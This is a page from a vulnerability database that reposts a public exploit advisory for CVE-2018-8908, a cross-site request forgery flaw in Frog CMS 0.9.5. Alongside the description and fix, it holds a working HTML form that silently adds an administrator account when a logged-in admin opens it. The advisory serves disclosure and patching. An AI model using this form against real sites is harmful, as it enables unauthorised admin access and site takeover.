Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSamrat Das1337DAY-ID-30093
HistoryApr 02, 2018 - 12:00 a.m.

Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) Vulnerability

2018-04-0200:00:00
Samrat Das
0day.today
22

0.002 Low

EPSS

Percentile

56.0%

JSON

Exploit for php platform in category web applications

# Exploit Title:​​ Cross Site Request Forgery- Frog CMS
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE :  CVE-2018-8908
# Category: Webapp CMS
 
 
1. Description
 
The application source code is coded in a way which allows malicious HTML
request to be executed without veryifying source of request.This leads to
arbitary execution with malicous request which will lead to the creation of
a privileged user.
 
2. Proof of Concept
 
      Visit the application
      Visit the Add Users Page.
      Craft an html page with all the details for an admin user creation
and host it on a server
      Upon the link being clicked by a logged in admin user, immidiately,
another admin user will get created.
 
Exploit Code:
 
<html>
  <body>
    <form action="http://localhost/frog/admin/?/user/add" method="POST">
      <input type="hidden" name="user&#91;name&#93;" value="Test&#95;1" />
      <input type="hidden" name="user&#91;email&#93;" value="" />
      <input type="hidden" name="user&#91;username&#93;" value="test" />
      <input type="hidden" name="user&#91;password&#93;" value="test" />
      <input type="hidden" name="user&#91;confirm&#93;" value="test" />
      <input type="hidden"
name="user&#95;permission&#91;administrator&#93;" value="1" />
      <input type="hidden" name="commit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
3. Solution:
 
Solution - Fix & Patch: The application code should be configured to
implement anti csrf token to filter malicous HTTP Requests.
 
 
4. Public Reference with POC and steps:
 
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
 
Thanks and Regards
Samrat

#  0day.today [2018-04-03]  #

Related

exploitpack 1
cve 1
prion 1
nvd 1
packetstorm 1
cvelist 1
exploitdb 1
exploitpack
exploitpack
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
2018-04-02 00:00:00
cve
cve
CVE-2018-8908
2018-03-31 22:29:00
prion
prion
Cross site request forgery (csrf)
2018-03-31 22:29:00
nvd
nvd
CVE-2018-8908
2018-03-31 22:29:00
packetstorm
packetstorm
Frog CMS 0.9.5 Cross Site Request Forgery
2018-03-31 00:00:00
cvelist
cvelist
CVE-2018-8908
2018-03-31 22:00:00
exploitdb
exploitdb
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
2018-04-02 00:00:00

0.002 Low

EPSS

Percentile

56.0%

JSON
Related for 1337DAY-ID-30093
exploitpack1cve1prion1nvd1packetstorm1cvelist1exploitdb1